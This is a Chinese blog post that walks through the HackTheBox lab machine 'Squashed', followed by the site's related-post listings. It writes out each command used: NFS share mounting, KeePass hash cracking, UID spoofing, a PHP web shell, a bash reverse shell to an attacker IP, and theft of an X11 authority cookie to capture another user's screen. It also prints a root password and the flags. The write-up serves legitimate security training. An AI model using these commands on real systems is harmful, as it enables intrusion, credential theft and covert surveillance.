hackthebox-Tracks-CREST_CRT-Squashed

于 2023-02-15 09:49:17 发布
阅读量250 收藏
点赞数
分类专栏: hackthebox 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lalalaze/article/details/129037759
版权

查看mount挂载

showmnout -e 10.129.218.138

挂载 /home/ross

sudo mount -t nfs 10.129.218.138:/home/ross ./test1

在 /Documents 文件下面发现 Passwords.kdbx

挂载 /var/www/html

sudo mount -t nfs 10.129.218.138:/var/www/html ./test1

.kdbx 文件由KeePass Password Safe创建,这是Windows的免费密码管理器;存储密码的加密数据库,该数据库只能使用用户设置的主密码查看;用于安全存储Windows、电子邮件帐户、FTP站点、电子商务站点和其他用途的个人登录凭据。

破解 Passwords.kdbx

1、将Passwords.kdbx下载到本地

2、将 Passwords.kdbx 内容转为 john 支持的格式: keepass2john Passwords.kdbx > hash.txt

3、然后使用 john 破解: john --wordlist=rockyou.txt hash.txt

使用 nmap 看一下文件夹的 nfs 权限。

sudo nmap 10.129.218.138 --script nfs-ls

/var/www/html 需要UID为 2017的用户

创建一个新账户

sudo useradd test

sudo usermod -u 2017 test

sudo su test

成功进入 /var/www/html

尝试在网站根目录写入木马文件

echo -e '<?php\n system($_REQUEST['cmd']);\n?>' > test3.php

成功执行命令

反弹shell

bash -c 'bash -i >& /dev/tcp/10.10.16.3/7898 0>&1'

本地监听

将 & 符号进行url编码为%26

http://10.129.218.138/test3.php?cmd=bash -c 'bash -i >%26 /dev/tcp/10.10.16.3/7898 0>%261'

升级shell

script /dev/null -c bash

创建一个 UID 为 1001 的用户。读取/home/ross/ .Xauthority 文件(https://stackoverflow.com/questions/37157097/how-does-x11-authorization-work-mit-magic-cookie/37367518#37367518)

sudo useradd test1

sudo usermod -u 1001 test1

以 base64编码 .Xauthority 文件 并传输至 /tmp/xauth

cat .Xauthority | base64 > /tmp/xauth

cd /tmp && python3 -m http.server

在 alex shell中下载此文件

使用w查看当前连接显示器的用户

现在使用 xwd 通过传递.Xauthority凭据文件截取用户 Ross 的屏幕截图:

cat xauth | base64 -d > xauth1

使用命令XAUTHORITY=/tmp/xauth1将其设置为我的会话。

{Xauthority。可以在每个用户的主目录中找到 .Xauthority 文件。它用于将凭据存储在 xauth 使用的 cookie 中以用于对 XServer 进行身份验证。启动 XServer 实例 (Xorg) 后,该 cookie 将用于对与该特定显示的连接进行身份验证。}

XAUTHORITY=/tmp/xauth1

export XAUTHORITY #export [.Xauthority文件的路径]

xauth list

(https://blog.csdn.net/weixin_33318722/article/details/116819263)

xwd -root -screen -silent -display :0 > out.xwd

-root 选择主根窗口,不需要我用鼠标选择一个子窗口(这在远程 shell 中是不可能的)

-screen 确保 GetImage 请求转到根窗口

-silent 关闭屏幕截图附带的典型铃声

display :0 指定要连接的窗口

(https://feichashao.com/xwd-screenshot/)

convert out.xwd out.png

获取root账户密码

root::cah$mei7rai9A

alex shell中提权到root

获取普通用户flag

a53dc2939c7f87d5b04d2158bde9aeba

获取 root flag

447fcdaf61c71dcbd881681eaaa57471

参考

https://hackmd.io/@tahaafarooq/squashed-hackthebox-writeup?utm_source=preview-mode&utm_medium=rec

:)--+
关注
专栏目录
kdbx后缀文件打开
墨痕诉清风的博客
05-31 3383
KDBX 格式是在KeePass的版本2中引入的。以前的版本使用了.KDB 格式。KeePass 2可以导入旧的KDB文件,也可以导出为KDB格式。注意:KeePass的Mac和Linux版本被称为KeePassX。但是,此版本尚不支持.KDBX 格式。windows 使用 KeePass 工具打开(资源已上传到附件)kali 使用 keepass2 工具打开。.kdbx 文件是数据文件。文件名:abc.kdbx。
https://app.hackthebox.com/machines/Squashed
32bin的博客
04-09 7406
【代码】攻防世界-level0。
Hackthebox Shared 利用cookie进行sql注入,Redis沙盒逃逸漏洞提权
Ba1_Ma0的博客
11-11 1336
这个漏洞允许一个用户以另一个用户身份运行代码,我们可以执行cat命令,查看dan_smith用户的ssh密钥,之后ssh登录就好了。成功得到dan_smith用户的密钥,在kali上创建一个名为id_rsa的文件,设置权限为600,将密钥复制进去。我们可以创建一个文件,里面是我们的反向shell,然后让程序执行这个文件,就能拿到root权限了。成功获得dan_smith用户的权限,在查看用户时,发现了一个奇怪的组。找到一个有suid权限的程序,他是root用户创建的,但是我们可以执行。
VulnHub—DriftingBlues: 5
Cobra的博客
04-06 2055
一、信息收集 1、使用nmap扫描存活主机 2、发现192.168.189.158开放了80和22端口,访问其80端口 3、发现是用wordpress搭建的站点,对其进行目录扫描发现wordpress后台 4、尝试使用wpscan对用户名和密码进行爆破 先用cewl生成相应的字典 cewl -m 6 -w passwd.txt http://192.168.189.158/ 成功爆出一个用户的密码 5、使用改用户登录之后发现一张跟靶机主题相关的图片 6.
靶机渗透练习05-driftingblues5
Force~
03-29 2220
靶机地址: https://www.vulnhub.com/entry/driftingblues-5,662/ 1、主机探活 arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号) netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段) nmap -s.
Overpass_for_Magic_Tracks_-_easy_print_magic_3dpstl_
10-03
标题 "Overpass_for_Magic_Tracks_-_easy_print_magic_3dpstl_" 暗示了这是一个关于3D打印的项目,特别设计用于Magic Tracks,一种可拼接、灵活弯曲的赛车轨道。"3dp"代表3D打印,而"magic 3dpstl"可能是指这个项目...
py-eddy-tracker-master_satphy_python_tracker_tracking_中尺度涡_
10-03
实现对中尺度涡的标注,完成中尺度涡分布的绘图
react-concurrent-mode-typescript-example::shuffle_tracks_button:在TypeScript中使用React并发模式的示例
05-06
:shuffle_tracks_button: React并发模式TypeScript示例 这是一个带有TypeScript的项目示例。 此外,它启用了实验并发模式和暂挂功能,并包括适当的实验类型。 目的是您可以探索和试验新的实验性功能,但可以使用...
MSRX6-20151123214504525_MagStripe_DecodeMagStripe_Tracks_MSRX6_源
09-28
read write erase all 3 tracks for magstripe cards
react-movable::shuffle_tracks_button:拖放您的React列表和表格。 无障碍。 小
02-05
React移动 ! 安装 yarn add react-movable 用法 import * as React from 'react' ; import { List , arrayMove } from 'react-movable' ; const SuperSimple : React .... const [ items , setItems ] = React ....
keepass.py:用于读取 kdbx 文件的后端和命令行工具
07-07
keepass.py 用于读取 kdbx 文件的后端和命令行工具 使用作为实现格式的文档。 不幸的是,该链接上的数据不完整,导致实施无法正常工作。
windows系统kdbx文件打开工具
最新发布
05-31
kdbx文件打开工具
HackTheBox:Hack The Box笔测试和挑战
03-08
哈克盒子 Hack The Box笔测试和来自挑战 在这里,我们有Hack The Box的演练。
mod0keecrack:KeePass 2数据库主密码破解程序
04-28
mod0keecrack 介绍 KeePass是一个免费的开源密码管理器,可帮助您以安全的方式管理密码。 您可以将所有密码放在一个数据库中,该数据库由一个主密钥或一个密钥文件锁定。 (来源: : ) mod0keecrack是破解KeePass 2数据库密码的一种简单工具。 它为.kdbx文件实现了KeePass 2数据库文件解析器以及解密例程,以验证所提供的密码是否正确。 mod0keecrack仅处理加密的文件格式,无法解析生成的明文数据库。 mod0keecrack的唯一目的是对KeePass 2数据库密码进行暴力破解。 mod0keecrack处理KeePass 2数据库,该数据库仅使用密码或使用密码和密钥文件进行加密。 当前,还没有实现用于密码短语生成的增量式或基于模板的蛮力算法。 要使用mod0keecrack,您需要生成自己的单词列表或通过pipe / stdin提
keepass:用于Crystal的Keepass KDBX v2v3解析器
02-05
keepass:用于Crystal的Keepass KDBX v2v3解析器
内存取证CTF-Memlabs靶场2
qq_42947816的博客
02-01 1485
MemLabs 是一组具有教育意义的介绍性 CTF 式挑战,旨在鼓励学生、安全研究人员以及 CTF 玩家开始使用内存取证领域。
2022DASCTF Apr X FATE 熟悉的猫
qq_61620566的博客
05-05 508
文件解压,flag.zip和len5.kdbx 这里不要用Windows自带的解压方式打开,flag.zip否则会报错,如上所示,用bandzip 解压到桌面,接着.kdbx文件用专门的软件打开:链接:https://keepass.info/news/n220109_2.50.html 将.kdbx 文件放到kali下,用kali卡里自带的解密工具keepass2john 获取文件的hash,这里注意我用箭头标注的地方,之前有一段字母,要去掉之后才能解密,即len5之前的内容全...
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-5
Aluxian_的博客
06-21 1697
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。官网地址:https://www.vulnhub.com/entry/driftingblues-5,662/ 前言:这里又是DriftingBlues-2的问题 需要自己配网卡具体参考:https://blog.csdn.net/Alu
Hackmyvm综合靶机 | Driftingblues-5
IerkeU的博客
04-14 557
当我们需要将项目部署到远程服务器或者在服务器之间传输数据时,经常会使用scp命令(linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令)
通过echarts根据hangzhou-tracks.json绘制地图
05-14
首先,需要下载并引入echarts库,可以在官网下载或者通过CDN引入。然后,需要准备好数据文件hangzhou-tracks.json,该文件包含杭州市的地理信息。最后,可以根据数据文件使用echarts绘制地图。 以下是一个简单的例子: ```html <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>ECharts - Hangzhou Map</title> <!-- 引入echarts库 --> <script src="https://cdn.jsdelivr.net/npm/echarts/dist/echarts.min.js"></script> </head> <body> <!-- 定义一个画布 --> <div id="map" style="width: 800px;height: 600px;"></div> <script> // 初始化echarts实例 var myChart = echarts.init(document.getElementById('map')); // 加载数据 myChart.showLoading(); $.getJSON('hangzhou-tracks.json', function (data) { myChart.hideLoading(); // 绘制地图 echarts.registerMap('hangzhou', data); myChart.setOption({ series: [{ type: 'map', map: 'hangzhou' }] }); }); </script> </body> </html> ``` 其中,`echarts.init`用来初始化一个echarts实例,`echarts.registerMap`用来注册地图数据,`myChart.setOption`用来设置地图的参数。具体的参数可以在echarts官网上查看文档。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值